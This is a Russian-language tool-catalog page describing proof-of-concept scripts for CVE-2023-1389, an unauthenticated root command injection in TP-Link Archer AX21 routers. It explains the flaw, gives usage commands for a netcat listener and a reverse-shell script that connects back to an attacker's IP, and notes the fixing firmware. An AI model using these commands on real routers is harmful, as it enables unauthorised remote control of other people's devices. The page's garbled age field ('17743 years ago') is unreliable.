Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-1389 — PoC-скрипты для CVE-2023-1389 — неаутентифицированная инъекция команд в TP-Link Archer AX21, обеспечивающая передачу файлов и возможности reverse shell. | Kitploit
Инструменты/GitHubGitHub/voyag3r-security/cve-2023-1389
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubvoyag3r-security/cve-2023-1389

CVE-2023-1389

PoC-скрипты для CVE-2023-1389 — неаутентифицированная инъекция команд в TP-Link Archer AX21, обеспечивающая передачу файлов и возможности reverse shell.

Репозиторий
17743 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Описание

CVE-2023–1389 — это уязвимость неаутентифицированного внедрения команд в Wi-Fi-роутере TP-Link Archer AX21. Обратный вызов в параметре country использует функцию popen(), которая выполняется от root, что позволяет атакующему внедрять произвольные значения через GET или POST запросы к интерфейсу администратора без необходимости аутентификации. Более подробную информацию об уязвимости можно найти здесь.

Вот несколько Proof-of-Concept (PoC), которые я создал во время исследования внедрения команд. Archer-file-transfer.py был первой итерацией и довольно запутан в том, как он достигает взаимодействия. Archer-rev-shell.py предоставляет простую обратную оболочку netcat и, вероятно, является тем, за чем вы пришли. Если вы хотите узнать больше о разработке этих скриптов, вы можете прочитать пост здесь.

Использование

В одном окне терминала:

root@kitploit:~
nc your_IP listener_port

Во втором окне терминала:

root@kitploit:~
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port

Устранение

TP-Link выпустил версию прошивки 1.1.4 Build 20230219, которая устраняет проблему, удаляя уязвимый обратный вызов. Обновление вашего роутера до последней прошивки должно защитить ваше устройство.

Будущее

Я, вероятно, не буду поддерживать эти PoC. Оба они довольно просты и должны легко модифицироваться по мере необходимости.

Скачать инструмент